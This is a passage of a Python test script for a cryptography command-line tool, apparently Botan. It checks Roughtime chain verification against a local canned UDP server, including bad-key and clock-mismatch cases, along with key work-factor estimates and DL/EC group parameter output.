ed25519 gD63hSj3ScS+wuOeGrubXlq35N1c5Lby/S+T7MNTjxo= uLeTON9D+2HqJMzK6sYWLNDEdtBl9t/9yw1cVAOm0/sONH5Oqdq9dVPkC9syjuWbglCiCPVF+FbOtcxCkrgMmA== BQAAAEAAAABAAAAApAAAADwBAABTSUcAUEFUSFNSRVBDRVJUSU5EWOw1jl0uSiBEH9HE8/6r7zxoSc01f48vw+UzH8+VJoPelnvVJBj4lnH8uRLh5Aw0i4Du7XM1dp2u0r/I5PzhMQoDAAAABAAAAAwAAABSQURJTUlEUFJPT1RAQg8AUBo+tEqPBQC47l77to7ESFTVhlw1SC74P5ssx6gpuJ6eP+1916GuUiySGE/x3Fp0c3otUGAdsRQou5p9PDTeane/YEeVq4/8AgAAAEAAAABTSUcAREVMRe5T1ml8wHyWAcEtHP/U5Rg/jFXTEXOSglngSa4aI/CECVdy4ZNWeP6vv+2//ZW7lQsrWo7ZkXpvm9BdBONRSQIDAAAAIAAAACgAAABQVUJLTUlOVE1BWFQpXlenV0OfVisvp9jDHXLw8vymZVK9Pgw9k6Edf8ZEhUgSGEc5jwUASHLvZE2PBQAAAAAA
ed25519 etPaaIxcBMY1oUeGpwvPMCJMwlRVNxv51KK/tktoJTQ= U53wX99JzZwy4BXa9C6R04bPu4yqFB5w5/wTgG8Mw5wm+VLrY70ECxJ9ZHnpdHVHaLEU3aeLnQFZyZPRAEOCyw== BQAAAEAAAABAAAAApAAAADwBAABTSUcAUEFUSFNSRVBDRVJUSU5EWMh3mPWCCbOlX8xDWbU9qdfKoReJX/XLsivom8bJJYmcC7T03tyXrtWUheEJweHtg4qMgSyifQS1MjHJSy1jPAsDAAAABAAAAAwAAABSQURJTUlEUFJPT1RAQg8Akxw/tEqPBQBfOsOuciR7jiAW5itQ39y8yVr/ZJmgMwvTjqaU4/wA05ZqG4RqoLdvDXh5bCNySL6LrrnBNSAHwn5COt0CItNuAgAAAEAAAABTSUcAREVMRVP3BIOzsZmuxqMi+ScIBPyKtzFfK7ZlPFNP0JrNwln2QYtAcQFIKywDdNAAL+n8i3dz1p99K50FJjCkCl2J6AMDAAAAIAAAACgAAABQVUJLTUlOVE1BWFQKC/kZVdjiNT2NCSGfnpot4eqipyMFsyMjiIQmqqqXqQCAa245jwUAAGCgA56PBQAAAAAA
ed25519 AW5uAoTSTDfG5NfY1bTh08GUnOqlRb+HVhbJ3ODJvsE= IcZcXFuaLKYYhWcK3sT/6PrVeXMmabCRbf9hvVfkMkqEW1PFL++ZnHJ1/m+G8azITxvktwsfP1YAOOxWdbf9XQ== BQAAAEAAAABAAAAApAAAADwBAABTSUcAUEFUSFNSRVBDRVJUSU5EWL5DAl8GPNUQ/mSXl0tI4N9yZAO+PiXTodJOTDL+WU/x26iqgyyQRikSSocRMzAEVLDGasdyW19mVC6H/6vfXggDAAAABAAAAAwAAABSQURJTUlEUFJPT1RAQg8Av/JAtEqPBQBIP346SHhCdDfughzeH+uYSbxngDYxqHzBDtZt0obUKrzxfRWzD1oR61B1reLvoPVCKSfzEngi/g1NSQjTrzNMAgAAAEAAAABTSUcAREVMRTQLLplQv0rN4p77Bo59qT8bbquV6MKSwILI/Tw2LLGo9noaZegUFmM+rNu1d1AVOEVQ01j6/2xDmBvp0d6MZgEDAAAAIAAAACgAAABQVUJLTUlOVE1BWFS4a1dYoIB5u/zkbR3sIteuhVrQkszzj+Gng9ywo6O9VgAAAAAAAAAA//////////8AAAAA
ed25519 cj8GsiNlRkqiDElAeNMSBBMwrAl15hYPgX50+GWX/lA= Tsy82BBU2xxVqNe1ip11OyEGoKWhKoSggWjBmDTSBmKbTs7bPPCEidYc5TQ23sQUWe62G35fQOVU28q+Eq5uhQ== BQAAAEAAAABAAAAApAAAADwBAABTSUcAUEFUSFNSRVBDRVJUSU5EWDAmi7zgXAqLgQXVfbjeqnUZRiXCZI64QIoAKFL83CQHbyXgB4cNwHfQ9mSg0hYxTp1M8QxOuzusnUpk05DIRwwDAAAABAAAAAwAAABSQURJTUlEUFJPT1RAQg8AcOBCtEqPBQBhsr1mKOxxCf4VDFzAtYB4Nhs332AN1LrJU/8+VqktzfPd2R7awJHEVEWugvSvOrr+9d332mQObAkYfKfDtbSFAgAAAEAAAABTSUcAREVMRUjnhDvkIjFzTEYtgHOfMpRHtnNZj4P31RFtapkwzGjOtc93pYDd7zqQCw2AVcfbSnPqa8k26z96Q9fVRzq0pw8DAAAAIAAAACgAAABQVUJLTUlOVE1BWFR7qp2oerjpbN8Y23nUGARIlsgkodW4owH29ZKhxDMn8AAAAAAAAAAA//////////8AAAAA
""")
    test_cli("roughtime_check", chain, """\
1: UTC 2019-08-04T13:38:17 (+-1000000us)
2: UTC 2019-08-04T13:38:17 (+-1000000us)
3: UTC 2019-08-04T13:38:17 (+-1000000us)
4: UTC 2019-08-04T13:38:18 (+-1000000us)
5: UTC 2019-08-04T13:38:18 (+-1000000us)""")

    # Single-link chain checked with raw microsecond timestamps.
    with open(chain, 'w') as f:
        f.write("ed25519 bbT+RPS7zKX6w71ssPibzmwWqU9ffRV5oj2OresSmhE= eu9yhsJfVfguVSqGZdE8WKIxaBBM0ZG3Vmuc+IyZmG2YVmrIktUByDdwIFw6F4rZqmSFsBO85ljoVPz5bVPCOw== BQAAAEAAAABAAAAApAAAADwBAABTSUcAUEFUSFNSRVBDRVJUSU5EWBnGOEajOwPA6G7oL47seBP4C7eEpr57H43C2/fK/kMA0UGZVUdf4KNX8oxOK6JIcsbVk8qhghTwA70qtwpYmQkDAAAABAAAAAwAAABSQURJTUlEUFJPT1RAQg8AJrA8tEqPBQAqisiuAxgy2Pj7UJAiWbCdzGz1xcCnja3T+AqhC8fwpeIwW4GPy/vEb/awXW2DgSLKJfzWIAz+2lsR7t4UjNPvAgAAAEAAAABTSUcAREVMRes9Ch4X0HIw5KdOTB8xK4VDFSJBD/G9t7Et/CU7UW61OiTBXYYQTG2JekWZmGa0OHX1JPGG+APkpbsNw0BKUgYDAAAAIAAAACgAAABQVUJLTUlOVE1BWFR/9BWjpsWTQ1f6iUJea3EfZ1MkX3ftJiV3ABqNLpncFwAAAAAAAAAA//////////8AAAAA")
    test_cli("roughtime_check", [chain, "--raw-time"], "1: UTC 1564925897781286 (+-1000000us)")

    # Same response but with a corrupted server public key (first char of the
    # key changed) -- verification must fail with an error on stderr.
    with open(chain, 'w') as f:
        f.write("ed25519 cbT+RPS7zKX6w71ssPibzmwWqU9ffRV5oj2OresSmhE= eu9yhsJfVfguVSqGZdE8WKIxaBBM0ZG3Vmuc+IyZmG2YVmrIktUByDdwIFw6F4rZqmSFsBO85ljoVPz5bVPCOw== BQAAAEAAAABAAAAApAAAADwBAABTSUcAUEFUSFNSRVBDRVJUSU5EWBnGOEajOwPA6G7oL47seBP4C7eEpr57H43C2/fK/kMA0UGZVUdf4KNX8oxOK6JIcsbVk8qhghTwA70qtwpYmQkDAAAABAAAAAwAAABSQURJTUlEUFJPT1RAQg8AJrA8tEqPBQAqisiuAxgy2Pj7UJAiWbCdzGz1xcCnja3T+AqhC8fwpeIwW4GPy/vEb/awXW2DgSLKJfzWIAz+2lsR7t4UjNPvAgAAAEAAAABTSUcAREVMRes9Ch4X0HIw5KdOTB8xK4VDFSJBD/G9t7Et/CU7UW61OiTBXYYQTG2JekWZmGa0OHX1JPGG+APkpbsNw0BKUgYDAAAAIAAAACgAAABQVUJLTUlOVE1BWFR/9BWjpsWTQ1f6iUJea3EfZ1MkX3ftJiV3ABqNLpncFwAAAAAAAAAA//////////8AAAAA")
    test_cli("roughtime_check", chain, expected_stderr=b'Error: Roughtime Invalid signature or public key\n')
def cli_roughtime_tests(tmp_dir):
    """Test the roughtime client command against a canned local UDP server.

    Spawns a daemon thread that replays pre-recorded Roughtime responses,
    then exercises public-key validation, local clock checking, chain-file
    maintenance, and --max-chain-size trimming.
    """
    # pylint: disable=line-too-long
    # pylint: disable=too-many-locals
    import socket
    import base64
    import threading

    if not check_for_command("roughtime"):
        return

    server_port = random_port_number()
    chain_file = os.path.join(tmp_dir, 'roughtime-chain')
    ecosystem = os.path.join(tmp_dir, 'ecosystem')

    def run_udp_server():
        # Replays the currently selected canned response for each datagram.
        # server_request/server_response are read from the enclosing scope at
        # call time, so reassigning them below switches the expected exchange.
        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        server_address = ('127.0.0.1', server_port)
        sock.bind(server_address)
        while True:
            data, address = sock.recvfrom(4096)
            if data:
                if data != base64.b64decode(server_request):
                    logging.error("unexpected request")
                sock.sendto(base64.b64decode(server_response), address)
    udp_thread = threading.Thread(target=run_udp_server)
    udp_thread.daemon = True  # don't keep the interpreter alive at exit
    udp_thread.start()

    # Expected on-disk chain file contents after each successive client run
    chain = [
        """\
ed25519 gD63hSj3ScS+wuOeGrubXlq35N1c5Lby/S+T7MNTjxo= 2A+I9q2+ZayxDDYC5n2YW8Bn/zBm4D3mwS5qMwADRDcbFpBcf3yPOyeZiqpLBTkxo8GT8zMQFeApv4ScffjC8A== BQAAAEAAAABAAAAApAAAADwBAABTSUcAUEFUSFNSRVBDRVJUSU5EWDwlo/AkUnTrecAW4Ci5Tkh3KOqs6R7KLTsFtq16RXN5F7G5ckGv11UtzHoZTbKbEk03a6ogAOK54Q2CI/7XGA8DAAAABAAAAAwAAABSQURJTUlEUFJPT1RAQg8AWDLihlaSBQAoq/5gEjRCrhfH16X2GYjQJSG/CgSuGhYeCsrw7XkphLI3cxw2unJRDW8DAJrYqEGaW0NPKZk7bbpPjU/Q6Es1AgAAAEAAAABTSUcAREVMRUJbs67Sb5Wx/jzWyT1PhWR0c4kg59tjSGofo8R3eHzcA9CGwavuRdxOArhVWWODG99gYgfmjcRLgt9/jH+99w4DAAAAIAAAACgAAABQVUJLTUlOVE1BWFRXRfQ1RHLWGOgqABUTYfVBDZrv3OL2nPLYve9ldfNVLOjdPVFFkgUA6D0Vb1mSBQAAAAAA
""",
        """\
ed25519 gD63hSj3ScS+wuOeGrubXlq35N1c5Lby/S+T7MNTjxo= 2A+I9q2+ZayxDDYC5n2YW8Bn/zBm4D3mwS5qMwADRDcbFpBcf3yPOyeZiqpLBTkxo8GT8zMQFeApv4ScffjC8A== BQAAAEAAAABAAAAApAAAADwBAABTSUcAUEFUSFNSRVBDRVJUSU5EWDwlo/AkUnTrecAW4Ci5Tkh3KOqs6R7KLTsFtq16RXN5F7G5ckGv11UtzHoZTbKbEk03a6ogAOK54Q2CI/7XGA8DAAAABAAAAAwAAABSQURJTUlEUFJPT1RAQg8AWDLihlaSBQAoq/5gEjRCrhfH16X2GYjQJSG/CgSuGhYeCsrw7XkphLI3cxw2unJRDW8DAJrYqEGaW0NPKZk7bbpPjU/Q6Es1AgAAAEAAAABTSUcAREVMRUJbs67Sb5Wx/jzWyT1PhWR0c4kg59tjSGofo8R3eHzcA9CGwavuRdxOArhVWWODG99gYgfmjcRLgt9/jH+99w4DAAAAIAAAACgAAABQVUJLTUlOVE1BWFRXRfQ1RHLWGOgqABUTYfVBDZrv3OL2nPLYve9ldfNVLOjdPVFFkgUA6D0Vb1mSBQAAAAAA
ed25519 gD63hSj3ScS+wuOeGrubXlq35N1c5Lby/S+T7MNTjxo= 2A+I9q2+ZayxDDYC5n2YW8Bn/zBm4D3mwS5qMwADRDcbFpBcf3yPOyeZiqpLBTkxo8GT8zMQFeApv4ScffjC8A== BQAAAEAAAABAAAAApAAAADwBAABTSUcAUEFUSFNSRVBDRVJUSU5EWHH5Ofs4HciIFXjE9egjDbistJptoMXIC7ugCgHhI4NPJqfYY256NpULXKc9c30ul7oHXQyKLfGd84mIAxC3UwQDAAAABAAAAAwAAABSQURJTUlEUFJPT1RAQg8AuOoUh1aSBQANeC4gGGG3a23PpmF+y6CrUS9VWjyj0Ydpl2tMVDLaK2vd5QtYKKJ3UOyprGKk0D/aPn4E3Bk2rE3BKBZRXM1AAgAAAEAAAABTSUcAREVMRci9uvioJssgd8txxFlqz9RqPx+YLVMkHmm24fMUtYGWF/nhkoEYVGT7O+tXSfHHY/KHcUZjVaZpEt/tmXlXBAUDAAAAIAAAACgAAABQVUJLTUlOVE1BWFSxhKhavdriTvCAtNVcK5yr0cAbsWp2MsrwUV5YTc+7V0CsaLZSkgUAQAxA1GaSBQAAAAAA
""",
        """\
ed25519 gD63hSj3ScS+wuOeGrubXlq35N1c5Lby/S+T7MNTjxo= SbWKPilWYrt+1vgFU3jlxGNOH6I/1npX8wl+KoraN3S6VDsyM6EfCV+JPEK8BsNoM2VIpMcSdjcVna/GwXwZkg== BQAAAEAAAABAAAAApAAAADwBAABTSUcAUEFUSFNSRVBDRVJUSU5EWHH5Ofs4HciIFXjE9egjDbistJptoMXIC7ugCgHhI4NPJqfYY256NpULXKc9c30ul7oHXQyKLfGd84mIAxC3UwQDAAAABAAAAAwAAABSQURJTUlEUFJPT1RAQg8AuOoUh1aSBQANeC4gGGG3a23PpmF+y6CrUS9VWjyj0Ydpl2tMVDLaK2vd5QtYKKJ3UOyprGKk0D/aPn4E3Bk2rE3BKBZRXM1AAgAAAEAAAABTSUcAREVMRci9uvioJssgd8txxFlqz9RqPx+YLVMkHmm24fMUtYGWF/nhkoEYVGT7O+tXSfHHY/KHcUZjVaZpEt/tmXlXBAUDAAAAIAAAACgAAABQVUJLTUlOVE1BWFSxhKhavdriTvCAtNVcK5yr0cAbsWp2MsrwUV5YTc+7V0CsaLZSkgUAQAxA1GaSBQAAAAAA
ed25519 gD63hSj3ScS+wuOeGrubXlq35N1c5Lby/S+T7MNTjxo= 2A+I9q2+ZayxDDYC5n2YW8Bn/zBm4D3mwS5qMwADRDcbFpBcf3yPOyeZiqpLBTkxo8GT8zMQFeApv4ScffjC8A== BQAAAEAAAABAAAAApAAAADwBAABTSUcAUEFUSFNSRVBDRVJUSU5EWN5Y0b2irPS1JgqJFQMciPg4aWd9qj1ZqcJc5bGXe1m4ZdAXa5OIhXa0+680MgpyhEHhqYJDIwH1XRa1OZx5YAUDAAAABAAAAAwAAABSQURJTUlEUFJPT1RAQg8AgBW3iFaSBQD9WI+Qr6NOZsDmP0PsnCo66mstM3ac5ZON+I+ZeEK8lZWBASvsD2JIfq3v4d1QH5g4STs3wOazQPc25Puy659ZAgAAAEAAAABTSUcAREVMRUJbs67Sb5Wx/jzWyT1PhWR0c4kg59tjSGofo8R3eHzcA9CGwavuRdxOArhVWWODG99gYgfmjcRLgt9/jH+99w4DAAAAIAAAACgAAABQVUJLTUlOVE1BWFRXRfQ1RHLWGOgqABUTYfVBDZrv3OL2nPLYve9ldfNVLOjdPVFFkgUA6D0Vb1mSBQAAAAAA
""",
    ]
    # base64 encodings of the client requests the fake server expects
    request = [
        "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",
    ]
    # base64 of the canned server responses, replayed verbatim by the thread
    response = [
        "BQAAAEAAAABAAAAApAAAADwBAABTSUcAUEFUSFNSRVBDRVJUSU5EWDwlo/AkUnTrecAW4Ci5Tkh3KOqs6R7KLTsFtq16RXN5F7G5ckGv11UtzHoZTbKbEk03a6ogAOK54Q2CI/7XGA8DAAAABAAAAAwAAABSQURJTUlEUFJPT1RAQg8AWDLihlaSBQAoq/5gEjRCrhfH16X2GYjQJSG/CgSuGhYeCsrw7XkphLI3cxw2unJRDW8DAJrYqEGaW0NPKZk7bbpPjU/Q6Es1AgAAAEAAAABTSUcAREVMRUJbs67Sb5Wx/jzWyT1PhWR0c4kg59tjSGofo8R3eHzcA9CGwavuRdxOArhVWWODG99gYgfmjcRLgt9/jH+99w4DAAAAIAAAACgAAABQVUJLTUlOVE1BWFRXRfQ1RHLWGOgqABUTYfVBDZrv3OL2nPLYve9ldfNVLOjdPVFFkgUA6D0Vb1mSBQAAAAAA",
        "BQAAAEAAAABAAAAApAAAADwBAABTSUcAUEFUSFNSRVBDRVJUSU5EWHH5Ofs4HciIFXjE9egjDbistJptoMXIC7ugCgHhI4NPJqfYY256NpULXKc9c30ul7oHXQyKLfGd84mIAxC3UwQDAAAABAAAAAwAAABSQURJTUlEUFJPT1RAQg8AuOoUh1aSBQANeC4gGGG3a23PpmF+y6CrUS9VWjyj0Ydpl2tMVDLaK2vd5QtYKKJ3UOyprGKk0D/aPn4E3Bk2rE3BKBZRXM1AAgAAAEAAAABTSUcAREVMRci9uvioJssgd8txxFlqz9RqPx+YLVMkHmm24fMUtYGWF/nhkoEYVGT7O+tXSfHHY/KHcUZjVaZpEt/tmXlXBAUDAAAAIAAAACgAAABQVUJLTUlOVE1BWFSxhKhavdriTvCAtNVcK5yr0cAbsWp2MsrwUV5YTc+7V0CsaLZSkgUAQAxA1GaSBQAAAAAA",
        "BQAAAEAAAABAAAAApAAAADwBAABTSUcAUEFUSFNSRVBDRVJUSU5EWN5Y0b2irPS1JgqJFQMciPg4aWd9qj1ZqcJc5bGXe1m4ZdAXa5OIhXa0+680MgpyhEHhqYJDIwH1XRa1OZx5YAUDAAAABAAAAAwAAABSQURJTUlEUFJPT1RAQg8AgBW3iFaSBQD9WI+Qr6NOZsDmP0PsnCo66mstM3ac5ZON+I+ZeEK8lZWBASvsD2JIfq3v4d1QH5g4STs3wOazQPc25Puy659ZAgAAAEAAAABTSUcAREVMRUJbs67Sb5Wx/jzWyT1PhWR0c4kg59tjSGofo8R3eHzcA9CGwavuRdxOArhVWWODG99gYgfmjcRLgt9/jH+99w4DAAAAIAAAACgAAABQVUJLTUlOVE1BWFRXRfQ1RHLWGOgqABUTYfVBDZrv3OL2nPLYve9ldfNVLOjdPVFFkgUA6D0Vb1mSBQAAAAAA",
    ]

    server_request = request[0]
    server_response = response[0]

    # Neither a servers file nor host/pubkey given: usage error
    test_cli("roughtime", [], expected_stderr=b'Please specify either --servers-file or --host and --pubkey\n')

    # Ecosystem file with a deliberately wrong public key (...Sj4... instead
    # of ...Sj3...) must be rejected
    with open(ecosystem, 'w') as f:
        f.write("Cloudflare-Roughtime ed25519 gD63hSj4ScS+wuOeGrubXlq35N1c5Lby/S+T7MNTjxo= udp 127.0.0.1:" + str(server_port))

    test_cli("roughtime", [
        "--check-local-clock=0",
        "--chain-file=",
        "--servers-file=" + ecosystem]
             , expected_stderr=b'ERROR: Public key does not match!\n')

    # Correct key, but the canned timestamp differs from the real local clock
    with open(ecosystem, 'w') as f:
        f.write("Cloudflare-Roughtime ed25519 gD63hSj3ScS+wuOeGrubXlq35N1c5Lby/S+T7MNTjxo= udp 127.0.0.1:" + str(server_port))

    test_cli("roughtime", [
        "--chain-file=",
        "--servers-file=" + ecosystem]
             , expected_stderr=b'ERROR: Local clock mismatch\n')

    # With clock checking disabled the canned response is accepted and the
    # chain file is created
    test_cli("roughtime", [
        "--check-local-clock=0",
        "--chain-file=" + chain_file,
        "--servers-file=" + ecosystem]
             , "Cloudflare-Roughtime : UTC 2019-09-12T08:00:11 (+-1000000us)")
    with open(chain_file, 'r') as f:
        read_data = f.read()
    if read_data != chain[0]:
        logging.error("unexpected chain")

    # Second exchange: host/pubkey form, raw microsecond timestamp output;
    # the chain file should now contain both links
    server_request = request[1]
    server_response = response[1]
    test_cli("roughtime", [
        "--check-local-clock=0",
        "--chain-file=" + chain_file,
        "--host=127.0.0.1:" + str(server_port),
        "--pubkey=gD63hSj3ScS+wuOeGrubXlq35N1c5Lby/S+T7MNTjxo=",
        "--raw-time"]
             , "UTC 1568275214691000 (+-1000000us)")
    with open(chain_file, 'r') as f:
        read_data = f.read()
    if read_data != chain[1]:
        logging.error("unexpected chain")

    # Third exchange: --max-chain-size=2 should trim the oldest link
    server_request = request[2]
    server_response = response[2]
    test_cli("roughtime", [
        "--check-local-clock=0",
        "--chain-file=" + chain_file,
        "--host=127.0.0.1:" + str(server_port),
        "--pubkey=gD63hSj3ScS+wuOeGrubXlq35N1c5Lby/S+T7MNTjxo=",
        "--max-chain-size=2"]
             , "UTC 2019-09-12T08:00:42 (+-1000000us)")
    with open(chain_file, 'r') as f:
        read_data = f.read()
    if read_data != chain[2]:
        logging.error("unexpected chain")
def cli_pk_workfactor_tests(_tmp_dir):
    """Check pk_workfactor estimates for representative key sizes/types."""
    cases = [
        ("1024", "80"),
        ("2048", "111"),
        (["--type=rsa", "512"], "58"),
        (["--type=dl", "512"], "58"),
        (["--type=dl_exp", "512"], "128"),
    ]
    for cli_args, expected_bits in cases:
        test_cli("pk_workfactor", cli_args, expected_bits)
def cli_dl_group_info_tests(_tmp_dir):
    """Verify dl_group_info prints a P and a G hex line for each MODP group."""
    line_format = re.compile('(P|G) = [A-F0-9]+')
    for group_bits in [1024, 1536, 2048, 3072, 4096, 6144, 8192]:
        info_lines = test_cli("dl_group_info", "modp/ietf/%d" % (group_bits)).split('\n')
        if len(info_lines) != 2:
            logging.error('Unexpected output from dl_group_info')
        for info_line in info_lines:
            if not line_format.match(info_line):
                logging.error('Unexpected output from dl_group_info')
def cli_ec_group_info_tests(_tmp_dir):
    """Check ec_group_info output for secp256r1 in both text and PEM forms."""
    # pylint: disable=line-too-long
    # Expected domain parameters (prime, curve coefficients, order, base point)
    secp256r1_info = """P = FFFFFFFF00000001000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF
A = FFFFFFFF00000001000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFC
B = 5AC635D8AA3A93E7B3EBBD55769886BC651D06B0CC53B0F63BCE3C3E27D2604B
N = FFFFFFFF00000000FFFFFFFFFFFFFFFFBCE6FAADA7179E84F3B9CAC2FC632551
G = 6B17D1F2E12C4247F8BCE6E563A440F277037D812DEB33A0F4A13945D898C296,4FE342E2FE1A7F9B8EE7EB4A7C0F9E162BCE33576B315ECECBB6406837BF51F5"""

    # Same parameters, DER-encoded and PEM-armored
